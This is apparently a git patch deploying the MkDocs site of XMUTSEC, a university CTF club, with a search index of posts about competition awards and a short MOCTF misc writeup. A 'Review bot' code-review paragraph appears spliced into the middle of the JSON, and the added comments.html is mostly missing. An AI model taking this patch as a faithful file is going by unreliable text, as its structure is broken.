From 86ada0c0bd90438e31ba7462bb21250cf2e5540d Mon Sep 17 00:00:00 2001
From: icecliffs
Date: Sun, 6 Aug 2023 12:16:42 +0800
Subject: [PATCH] Deployed 0caa7ba with MkDocs version: 1.4.3
---
 comments.html | 34 ++++++++++++++++++++++++
 search/search_index.json | 2 +-
 sitemap.xml.gz | Bin 615 -> 615 bytes
 writeup/CISCN-CTF-Quals-2023/index.html | 16 +----------
 4 files changed, 36 insertions(+), 16 deletions(-)
 create mode 100755 comments.html
diff --git a/comments.html b/comments.html
new file mode 100755
index 0000000..e31077d
--- /dev/null
+++ b/comments.html
@@ -0,0 +1,34 @@
+{% if page.meta.comments %}
+

{{ lang.t("meta.comments") }}

+ + + + +{% endif %}
diff --git a/search/search_index.json b/search/search_index.json
index 1b21547..7c55937 100755
--- a/search/search_index.json
+++ b/search/search_index.json
@@ -1 +1 @@
-{"config":{"lang":["ja"],"separator":"[\\s\\-\uff0c\u3002]+","pipeline":["stemmer"]},"docs":[{"location":"","title":"XMUTSEC","text":"
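Review bot: The new comments.html still contains raw Jinja (`{% if page.meta.comments %}`, `{{ lang.t("meta.comments") }}`, `{% endif %}`) in the deployed output, which suggests the Material comments partial was dropped into the docs tree and copied out as a static page instead of being placed under `overrides/partials/` where the theme would render it — as published it cannot inject a comment section and simply exposes the unrendered template at `/comments.html`. Only three of the 34 added lines are visible in this view, so I cannot see what the partial embeds; if it is the usual Giscus loader, that remote `<script>` is served with no integrity attribute or CSP `script-src`, which is worth revisiting once the partial is in the right place. The file is also created with mode `100755`; an HTML file should be `100644`. Since this is a generated `mkdocs gh-deploy` commit, the fix belongs on the source branch: move the file to `overrides/partials/comments.html` and set `theme.custom_dir: overrides` in mkdocs.yml rather than editing the deployed artifact.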

\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08XMUTSEC\uff09 - \u6210\u7acb\u4e8e\u4e8c\u3007\u4e00\u516d\u5e74\u9646\u6708\u4e5d\u65e5\u662f\u8ba1\u7b97\u673a\u5b66\u9662\u6307\u5bfc\u4e0b\u7684\u5b66\u672f\u79d1\u6280\u7c7b\u793e\u56e2\uff0c\u51e0\u4f4d\u5fd7\u540c\u9053\u5408\u7684\u5c11\u5e74\u4eba\u5728\u9e6d\u6c5f\u4e4b\u7554\u4e00\u62cd\u5373\u5408\u6210\u7acb\u4e86\u4e00\u652fCTF\u6218\u961fCodeMonster\u4e0e\u4e4b\u540c\u65f6\u8bde\u751f\u7684\u8fd8\u6709\u5723\u540e\u6eaa\u82f1\u5170\u5fb7\u7687\u5bb6\u5e7c\u513f\u56ed\u9644\u5c5e\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff08\u53a6\u95e8\u7406\u5de5\u5927\u5b66\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\uff09\uff0c\u534f\u4f1a\u4e3b\u8981\u7814\u7a76\u7684\u65b9\u5411\u4ee5\u5b89\u5168\u7c7b\u4e3a\u4e3b\uff0c\u6b64\u5916\uff0c\u534f\u4f1a\u4e5f\u4f1a\u7ec4\u7ec7\u5b66\u751f\u53c2\u52a0\u5b66\u672f\u7ade\u8d5b\uff0c\u4e3e\u529e\u5b66\u672f\u4ea4\u6d41\u7b49\u7b49\u3002

\u534f\u4f1a\u5b98\u7f51\uff1ahttps://www.xmutsec.cn

"},{"location":"#_1","title":"\u52a0\u5165\u6211\u4eec","text":"

\u52a0\u5165\u6807\u51c6 \uff08\u6ee1\u8db3\u4ee5\u4e0b\u4e24\u4e2a\u6761\u4ef6\u5373\u53ef\uff0c\u5305\u62ec\u54c1\u884c\u7aef\u6b63\uff09 - \u54c1\u884c\u7aef\u6b63

"},{"location":"#_2","title":"\u5b66\u4e60\u65b9\u5f0f","text":""},{"location":"award/","title":"\u8db3\u8ff9","text":""},{"location":"award/#_2","title":"\u8db3\u8ff9","text":""},{"location":"award/#_3","title":"\u4e3b\u529e","text":""},{"location":"award/#2023","title":"2023","text":"

\uff08FUCK U, COVID-19/\ud83d\udc47\uff09

"},{"location":"award/#2022","title":"2022","text":""},{"location":"award/#2021","title":"2021","text":"

\uff08FUCK U, COVID-19/\ud83d\udc46\uff09

"},{"location":"award/#2020","title":"2020","text":""},{"location":"award/#2019","title":"2019","text":""},{"location":"award/#2018","title":"2018","text":""},{"location":"award/#2017","title":"2017","text":""},{"location":"award/#2016","title":"2016","text":""},{"location":"member/","title":"\u534f\u4f1a\u6210\u5458","text":""},{"location":"member/#2021-2022","title":"2021-2022","text":""},{"location":"member/#2020-2021","title":"2020-2021","text":""},{"location":"member/#2019-2020","title":"2019-2020","text":""},{"location":"member/#2018-2019","title":"2018-2019","text":""},{"location":"member/#2017-2018","title":"2017-2018","text":""},{"location":"member/#2016-2017","title":"2016-2017","text":""},{"location":"posts/07cb34d3-7c51-43af-bfb2-84425b34c8f4/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u5168\u56fd\u603b\u51b3\u8d5b \u4e8c\u7b49\u5956","text":"

\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u53c8\u6709\u4e86\u65b0\u52a8\u5411\u300212\u67087\u65e5\uff0c2017-2018\u5168\u56fd\u9ad8\u6821\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u603b\u51b3\u8d5b\u5728\u5317\u4eac\u822a\u7a7a\u822a\u5929\u5927\u5b66\u76db\u5927\u5f00\u5e55\uff0c\u6765\u81ea\u5168\u56fd57\u6240\u9ad8\u6821\u7684\u7f51\u7edc\u5b89\u5168\u5b9e\u6218\u8d5b\u961f\u5728\u201c\u6570\u636e\u8d5b\u3001\u4f01\u4e1a\u8d5b\u3001\u4e2a\u4eba\u8d5b\u201c\u4e09\u4e2a\u65b9\u5411\u6bd4\u8d5b\u4e2d\u4e00\u51b3\u9ad8\u4e0b\uff0c\u4e3a\u5168\u56fd\u7f51\u7edc\u5b89\u5168\u5e02\u573a\u63d0\u4f9b\u4e86\u65b0\u4e00\u6279\u9ad8\u7aef\u4eba\u624d\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/0fbc0fc1-39e4-47ee-9cff-ba792b068f27/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e09\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"

\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e00\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster\u6218\u961f\u5168\u7701\u7b2c\u4e09\u593a\u5f97\u4e00\u7b49\u5956\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/","title":"\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u4fe1\u606f\u5b89\u5168\u534f\u4f1a\u6210\u7acb","text":"

\u672c\u534f\u4f1a\u6210\u7acb\u4e8e2016\u5e746\u67089\u65e5\uff0c\u81f4\u529b\u4e8e\u5bf9\u4fe1\u606f\u5b89\u5168\u65b9\u9762\u7684\u63a2\u7d22\u4e0e\u521b\u65b0\uff0c\u65e8\u5728\u4e3a\u6211\u6821\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u63d0\u4f9b\u4e00\u4e2a\u4ea4\u6d41\u5e73\u53f0\uff0c\u6269\u5927\u4fe1\u606f\u5b89\u5168\u5728\u6211\u6821\u7684\u5f71\u54cd\u529b\u3002

","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#_1","title":"\u534f\u4f1a\u6d3b\u52a8","text":"

\u672c\u534f\u4f1a\u901a\u8fc7\u53c2\u52a0CTF\u7ade\u8d5b\u7684\u5f62\u5f0f\u9a8c\u8bc1\u81ea\u5df1\u7684\u4fe1\u606f\u5b89\u5168\u6280\u672f\u6c34\u5e73 \u5404\u4f4d\u5927\u4f6c\u548c\u840c\u65b0\u53ef\u4ee5\u53bb\u534f\u4f1aCodeMonster\u6218\u961f\u4e0e\u96c6\u7f8e\u5927\u5b66\u4fe1\u5b89\u534f\u4f1a\u7684Mokirin\u6218\u961f\u5171\u540c\u642d\u5efa\u7ef4\u62a4\u7684MOCTF\u5e73\u53f0\u8fdb\u884c\u65e5\u5e38CTF\u5237\u9898\u3002

","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/131885e3-191c-40ac-af0d-79835e15d45b/#ctf","title":"CTF\u4ecb\u7ecd","text":"

CTF\uff08Capture The Flag\uff09\u4e2d\u6587\u4e00\u822c\u8bd1\u4f5c\u593a\u65d7\u8d5b\uff0c\u5728\u7f51\u7edc\u5b89\u5168\u9886\u57df\u4e2d\u6307\u7684\u662f\u7f51\u7edc\u5b89\u5168\u6280\u672f\u4eba\u5458\u4e4b\u95f4\u8fdb\u884c\u6280\u672f\u7ade\u6280\u7684\u4e00\u79cd\u6bd4\u8d5b\u5f62\u5f0f\u3002CTF\u8d77\u6e90\u4e8e1996\u5e74DEFCON\u5168\u7403\u9ed1\u5ba2\u5927\u4f1a\uff0c\u4ee5\u4ee3\u66ff\u4e4b\u524d\u9ed1\u5ba2\u4eec\u901a\u8fc7\u4e92\u76f8\u53d1\u8d77\u771f\u5b9e\u653b\u51fb\u8fdb\u884c\u6280\u672f\u6bd4\u62fc\u7684\u65b9\u5f0f\u3002\u53d1\u5c55\u81f3\u4eca\uff0c\u5df2\u7ecf\u6210\u4e3a\u5168\u7403\u8303\u56f4\u7f51\u7edc\u5b89\u5168\u5708\u6d41\u884c\u7684\u7ade\u8d5b\u5f62\u5f0f\uff0c2013\u5e74\u5168\u7403\u4e3e\u529e\u4e86\u8d85\u8fc7\u4e94\u5341\u573a\u56fd\u9645\u6027CTF\u8d5b\u4e8b\u3002\u800cDEFCON\u4f5c\u4e3aCTF\u8d5b\u5236\u7684\u53d1\u6e90\u5730\uff0cDEFCON CTF\u4e5f\u6210\u4e3a\u4e86\u76ee\u524d\u5168\u7403\u6700\u9ad8\u6280\u672f\u6c34\u5e73\u548c\u5f71\u54cd\u529b\u7684CTF\u7ade\u8d5b\uff0c\u7c7b\u4f3c\u4e8eCTF\u8d5b\u573a\u4e2d\u7684\u201c\u4e16\u754c\u676f\u201d \u3002 CTF\u5927\u81f4\u6d41\u7a0b\u662f\uff0c\u53c2\u8d5b\u56e2\u961f\u4e4b\u95f4\u901a\u8fc7\u8fdb\u884c\u653b\u9632\u5bf9\u6297\u3001\u7a0b\u5e8f\u5206\u6790\u7b49\u5f62\u5f0f\uff0c\u7387\u5148\u4ece\u4e3b\u529e\u65b9\u7ed9\u51fa\u7684\u6bd4\u8d5b\u73af\u5883\u4e2d\u5f97\u5230\u4e00\u4e32\u5177\u6709\u4e00\u5b9a\u683c\u5f0f\u7684\u5b57\u7b26\u4e32\u6216\u5176\u4ed6\u5185\u5bb9\uff0c\u5e76\u5c06

","tags":["\u534f\u4f1a\u6742\u8c08","\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6d1aa499-57ee-401b-a911-8062c6cae869/","title":"360\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7b2c\u56db\u540d","text":"

\u5317\u4eac\u65f6\u95f411\u670823\u65e5\uff0c\u7b2c\u4e8c\u5c4a48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u4e8e\u798f\u5dde\u6b63\u5f0f\u5f00\u6218\u3002\u4f5c\u4e3a\u4e00\u9879\u5bf9\u4ea7\u54c1\u5b89\u5168\u4e25\u683c\u8981\u6c42\u3001\u5411\u9ed1\u5ba2\u7cbe\u795e\u6781\u81f4\u8ffd\u9010\u3001\u7ed9\u4e88\u53c2\u8d5b\u9009\u624b\u9ad8\u989d\u5956\u52b1\u7684\u9ed1\u5ba2\u8d5b\u4e8b\uff0c\u672c\u5c4a\u9ed1\u5ba2\u9a6c\u62c9\u677e\u5438\u5f15\u4e86\u6765\u81ea\u5168\u56fd\u8fd110\u652f\u5b66\u751f\u9ed1\u5ba2\u6218\u961f\u53c2\u8d5b\uff0c\u5176\u4e2d\u5305\u62ec\u6765\u81ea\u53f0\u6e7e\u5730\u533a\u7684BambooFox\u548cTDOH\u4e24\u652f\u6218\u961f\u3002

48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u7531360\u5b89\u5168\u5e94\u6025\u54cd\u5e94\u4e2d\u5fc3\u4e3b\u529e\u7684\u9762\u5411360\u516c\u53f8IoT\u8bbe\u5907\u7684\u6f0f\u6d1e\u5956\u52b1\u8d5b\u4e8b\uff0c\u8bbe\u7f6e\u4e8636\u4e07\u4eba\u6c11\u5e01\u5956\u91d1\u6c60\uff0c\u5355\u4e2a\u6f0f\u6d1e\u5956\u52b1\u6700\u9ad8\u53ef\u8fbe5\u4e07\u5143\u3002

\u5c11\u5e74\u90ce\u5251\u8bd5\u5929\u4e0b\n

\u9ed1\u5ba2\u9a6c\u62c9\u677e\u6982\u5ff5\u6e90\u81ea\u7f8e\u56fd\uff0c\u5f53\u4e00\u7fa4\u9ad8\u624b\u4e91\u96c6\u4e00\u5802\uff0c\u4e92\u76f8\u6c9f\u901a\u548c\u5b66\u4e60\uff0c\u8fd9\u5c31\u6210\u4e86\u201d\u4e16\u754c\u4e0a\u6700\u9177\u7684\u6280\u672f\u72c2\u6b22\u201d\u3002\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u8d5b\u91c7\u7528\u4e8648\u5c0f\u65f6\u6781\u9650\u6f0f\u6d1e\u6316\u6398\u548c\u7834\u89e3\u76ee\u6807\u968f\u673a\u9009\u5b9a\u7684\u8d5b\u5236\uff0c\u53c2\u8d5b\u9009\u624b\u9700\u8981\u5728\u6bd4\u8d5b\u671f\u95f4\u8fde\u7eed\u4e0d\u4e2d\u65ad\u5730\u5bf9\u7279\u5b9a\u4ea7\u54c1\u8fdb\u884c\u6f0f\u6d1e\u6316\u6398\uff0c\u6bcf\u961f\u53ea\u914d\u5907\u4e00\u95f4\u4f11\u606f\u5ba4\u4ee5\u4f9b\u9009\u624b\u201c\u56de\u8840\u201d\u3002\u5728\u8fd9\u6837\u77ed\u7684\u65f6\u95f4\u5185\u5bfb\u627e\u7531\u5b89\u5168\u4eba\u5458\u53cd\u590d\u628a\u5173\u7684\u4ea7\u54c1\u6f0f\u6d1e\uff0c\u5e76\u975e\u6613\u4e8b\u3002\u4e0d\u8fc7\uff0c\u6ca1\u6709\u7edd\u5bf9\u5b89\u5168\u7684\u7cfb\u7edf\uff0c\u6211\u4eec\u4e5f\u5728\u671f\u5f85\u7740\u4ed6\u4eec\u7684\u7cbe\u5f69\u8868\u73b0\uff0c\u4e3a\u63d0\u5347360\u4ea7\u54c1\u5b89\u5168\u6027\u800c\u5927\u5c55\u8eab\u624b\uff01

\u9ed1\u4e0d\u662f\u76ee\u7684\uff0c\u5b89\u5168\u624d\u662f\u738b\u9053\n

360\u96c6\u56e2\u4f5c\u4e3a\u4e2d\u56fd\u9886\u5148\u7684\u4e92\u8054\u7f51\u7edc\u5b89\u5168\u4f01\u4e1a\uff0c\u6c47\u805a\u4e86\u56fd\u5185\u89c4\u6a21\u9886\u5148\u7684\u9ad8\u6c34\u5e73\u5b89\u5168\u6280\u672f\u56e2\u961f\uff0c\u79ef\u7d2f\u4e86\u63a5\u8fd1\u4e07\u4ef6\u539f\u521b\u6280\u672f\u548c\u6838\u5fc3\u6280\u672f\u7684\u4e13\u5229\uff0c\u5e76\u5728\u6b64\u57fa\u7840\u4e0a\u5f00\u53d1\u51fa\u62e5\u6709\u6570\u4ebf\u7528\u6237\u7684360\u5b89\u5168\u536b\u58eb\u3001360\u624b\u673a\u536b\u58eb\u7b49\u5b89\u5168\u4ea7\u54c1\uff0c\u540c\u65f6\u4e3a\u4e0a\u767e\u4e07\u5bb6\u56fd\u5bb6\u673a\u5173\u548c\u4f01\u4e8b\u4e1a\u5355\u4f4d\u63d0\u4f9b\u5305\u62ec\u5b89\u5168\u54a8\u8be2\u3001\u5b89\u5168\u8fd0\u7ef4\u3001\u5b89\u5168\u57f9\u8bad\u7b49\u5168\u65b9\u4f4d\u5b89\u5168\u670d\u52a1\u3002

\u6000\u63e3\u7528\u6237\u5b89\u5168\u7b2c\u4e00\u7684\u76ee\u7684\u548c\u51b3\u5fc3\uff0c48\u5c0f\u65f6\u9ed1\u5ba2\u9a6c\u62c9\u677e\u7834\u89e3\u5927\u5956\u8d5b\u9080\u8bf7\u5230\u9ad8\u6821\u5b66\u751f\u5bf9\u6307\u5b9a\u4ea7\u54c1\u8fdb\u884c\u5168\u9762\u6f0f\u6d1e\u6316\u6398\uff0c\u8003\u9a8c\u7684\u4e0d\u4ec5\u4ec5\u662f\u4e66\u672c\u4e0a\u7684\u77e5\u8bc6\uff0c\u8fd8\u6709\u4e2a\u4eba\u7684\u6280\u672f\u5b9e\u529b\u4e0e\u56e2\u961f\u7684\u534f\u540c\u914d\u5408\u3002\u6bd4\u8d5b\u4e00\u65b9\u9762\u53ef\u4ee5\u63d0\u5347360\u4ea7\u54c1\u7684\u5b89\u5168\u6027\uff0c\u53e6\u4e00\u65b9\u9762\u5219\u80fd\u4fc3\u8fdb\u65b0\u751f\u4ee3\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u4ea4\u6d41\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u4ece\u4e1a\u8005\u7684\u6280\u672f\u6c34\u5e73\uff0c\u5171\u540c\u6253\u9020\u66f4\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/","title":"\u4e3e\u529e\u7b2c\u4e00\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"

\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1\u676f\u201d\u7b2c\u4e00\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/6eba13d5-1e74-4680-8a10-9c18763b6389/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u6bd4\u8d5b\u6d77\u62a5\uff1a

\u6bd4\u8d5b\u73b0\u573a\uff1a

\u6bd4\u8d5b\u6392\u884c\u699c\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u4e8c\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u3001\u4f18\u80dc\u5956","text":"

\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

\u672c\u534f\u4f1a\u6d3e\u51fa\u7684\u4e09\u652f\u961f\u4f0d\u5206\u522b\u83b7\u5f97\u4e86\u4e8c\u7b49\u5956\u3001\u4e09\u7b49\u5956\u548c\u4f18\u80dc\u5956\uff0c\u5176\u4e2dCodeMonster\u6218\u961f\u5168\u7701\u7b2c\u516d\u593a\u5f97\u4e8c\u7b49\u5956\uff0c\u83b7\u5f972000\u5143\u5956\u91d1\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u6bd4\u8d5b\u73b0\u573a\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/72c8b299-29e5-4e88-a684-7c65b3931760/#_2","title":"\u6bd4\u8d5b\u89c6\u9891","text":"

\u6bd4\u8d5b\u89c6\u9891\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/86e69101-77f4-484a-ba0e-2957afabbdb6/","title":"2018 \u5b89\u6052\u201c\u897f\u6e56\u8bba\u5251\u676f\u201d\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4e2a\u4eba\u8d5b\u4e09\u7b49\u5956","text":"

\u7531\u56fd\u5bb6\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u7f51\u7edc\u5b89\u5168\u534f\u8c03\u5c40\u3001\u516c\u5b89\u90e8\u7f51\u7edc\u5b89\u5168\u4fdd\u536b\u5c40\u6307\u5bfc\uff0c\u6d59\u6c5f\u7701\u4e92\u8054\u7f51\u4fe1\u606f\u529e\u516c\u5ba4\u3001\u6d59\u6c5f\u7701\u516c\u5b89\u5385\u3001\u676d\u5dde\u5e02\u4eba\u6c11\u653f\u5e9c\u4e3b\u529e\uff0c\u676d\u5dde\u5e02\u7ecf\u6d4e\u548c\u4fe1\u606f\u5316\u59d4\u5458\u4f1a\u3001\u676d\u5dde\u5e02\u8427\u5c71\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u676d\u5dde\u5b89\u6052\u4fe1\u606f\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u627f\u529e\uff0c\u676d\u5dde\u5e02\u6ee8\u6c5f\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u3001\u56fd\u5bb6\u5de5\u4e1a\u4fe1\u606f\u5b89\u5168\u53d1\u5c55\u7814\u7a76\u4e2d\u5fc3\u3001\u56fd\u5bb6\u8ba1\u7b97\u673a\u7f51\u7edc\u5e94\u6025\u6280\u672f\u5904\u7406\u534f\u8c03\u4e2d\u5fc3\u3001\u963f\u91cc\u4e91\u8ba1\u7b97\u6709\u9650\u516c\u53f8\u3001\u676d\u5dde\u6d77\u5eb7\u5a01\u89c6\u6570\u5b57\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u6d59\u6c5f\u5927\u534e\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u8054\u5408\u627f\u529e\u7684\u897f\u6e56\u8bba\u5251\u2022\u7f51\u7edc\u5b89\u5168\u5927\u4f1a\u5b9a\u6863\u4eca\u5e744\u670827\u65e5\uff0c\u897f\u6e56\u8bba\u5251\u676f\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f5c\u4e3a\u672c\u6b21\u8bba\u575b\u4e2d\u6700\u53d7\u77a9\u76ee\u7684\u90e8\u5206\u4e4b\u4e00\uff0c\u4e5f\u5c06\u4e8e4\u670826\u65e5\u5f00\u542f\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/","title":"2018 \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09","text":"

\u81ea\u5df1\u53bb\u770b\u5427 http://www.ciscn.cn/home

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/","title":"\u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b","text":"

\u4ece\u653e\u5047\u5230\u73b0\u5728\u7b79\u529e\u51c6\u5907\u4e86\u63a5\u8fd1\u4e24\u4e2a\u661f\u671f\u7684MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u7ec8\u4e8e\u843d\u5e55\u5566\uff0c\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e00\u5171\u51fa\u4e861\u7b7e\u5230+1MISC+3WEB\uff0c\u4e0b\u9762\u5148\u653e\u5b98\u65b9WriteUp\uff08\u54c7\u7ec8\u4e8e\u80fd\u5f53\u4e00\u56de\u5b98\u65b9\u4e86\uff09

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_1","title":"\u7b7e\u5230","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#20","title":"\u7b7e\u5230 20","text":"
\u652f\u4ed8\u5b9d\u4eca\u5e74\u96c6\u9f50\u4e94\u798f\u80fd\u4e00\u8d77\u5e73\u5206\u591a\u5c11\u94b1\uff1f\nflag\u683c\u5f0f\uff1amoctf{\u6570\u5b57}\n

flag:moctf{500000000}

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#misc","title":"MISC","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#word-100","title":"\u7a7aword 100","text":"
\u771f\u7684\u4ec0\u4e48\u90fd\u6ca1\u6709\u5417\n

\u6587\u4ef6\u662f\u4e2aword \u6253\u5f00\u770b\u53d1\u73b0\u4e00\u4e9b\u5947\u602a\u7684\u6362\u884c\u548ctab \u5f88\u5bb9\u6613\u60f3\u5230\u662f\u6469\u65af\u5bc6\u7801\uff0c\u66ff\u6362\u540e\u5f97\u5230

-.... -.. -.... ..-. -.... ...-- --... ....- -.... -.... --... -... ....- ..--- -.... -.-. ...-- ....- -.... . -.... -... ..... ..-. ...-- ----- --... ..--- ..... ..-. --... ....- -.... .---- -.... ..--- ...-- ..-. --... -..\n

\u89e3\u6469\u65af\u5bc6\u7801\uff0c\u7136\u540ehex\u8f6c\u5b57\u7b26\u4e32\u5f97\u5230flag

